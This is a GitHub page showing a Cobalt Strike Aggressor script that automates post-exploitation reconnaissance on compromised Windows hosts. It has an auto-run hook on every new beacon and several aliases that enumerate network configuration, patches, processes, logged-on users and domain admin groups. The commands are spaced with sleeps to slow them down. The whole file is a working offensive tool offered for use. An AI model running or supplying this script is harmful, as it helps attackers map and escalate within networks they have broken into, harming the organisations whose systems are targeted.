-
Notifications
You must be signed in to change notification settings - Fork 7
/
SA.cna
62 lines (53 loc) · 2.2 KB
/
SA.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
alias SA {
blog($1, "
beacon_initial
SA_Advanced *warning* no sleep written in
SA_Powerpick
SA_Powershell
SA_XP *WARNING* no sleep wirtten in (will work on other WIN OS's aswell
SA_WMIC
")
}
on beacon_initial {
bpowerpick($1, "ipconfig /all ; sleep 120 ; whoami /groups ; sleep 120 ; net groups \"domain admins\" /domain ; sleep 120 ; netstat -napo tcp");
bps($1);
blog($1, "shell net user \"poopface.loser\" /domain");
}
alias SA_Advanced {
bshell($1, "wmic qfe list");
bshell($1, "wmic os get osarchitecture");
bshell($1, "netstat -napo tcp");
bshell($1, 'net group "domain admins" /domain');
bnet($1, "view");
}
alias SA_Powerpick {
bpowerpick($1, "ipconfig /all ; sleep 120 ; whoami /groups ; sleep 120 ; net groups \"domain admins\" /domain ; sleep 120 ; netstat -napo tcp");
bps($1);
blog($1, "shell net user \"poopface.loser\" /domain");
}
alias SA_Powershell {
bpowershell($1, "ipconfig /all ; sleep 120 ; whoami /groups ; sleep 120 ; net groups \"domain admins\" /domain ; sleep 120 ; netstat -napo tcp");
bps($1);
blog($1, "shell net user \"poopface.loser\" /domain");
}
alias SA_XP {
bshell($1, "ipconfig /all");
bshell($1, "whoami /groups");
bps($1);
bshell($1, "net groups \"domain admins\" /domain");
bshell($1, "netstat -napo tcp");
blog($1, "shell net user \"poopface.loser\" /domain");
}
alias SA_WMIC {
bshell($1, "wmic nicconfig where \"IPEnabled = True\" get IPAddress")
bshell($1, "wmic nicconfig where \"IPEnabled = True\" get DefaultIPGateway /value")
bshell($1, "wmic nicconfig where \"IPEnabled = True\" get IPSubnet")
bshell($1, "wmic nicconfig where \"IPEnabled = True\" get DNSHostname")
bshell($1, "wmic nicconfig where \"IPEnabled = True\" get DNSDomainSuffixSearchOrder")
bshell($1, "wmic nicconfig where \"IPEnabled = True\" get DNSServerSearchOrder")
bshell($1, "netstat -napo tcp")
bshell($1, "wmic process list brief")
bshell($1, "wmic computersystem get username")
bshell($1, "net groups \"domain admins\" /domain")
blog($1, "net users \"poopface.loser\" /domain")
}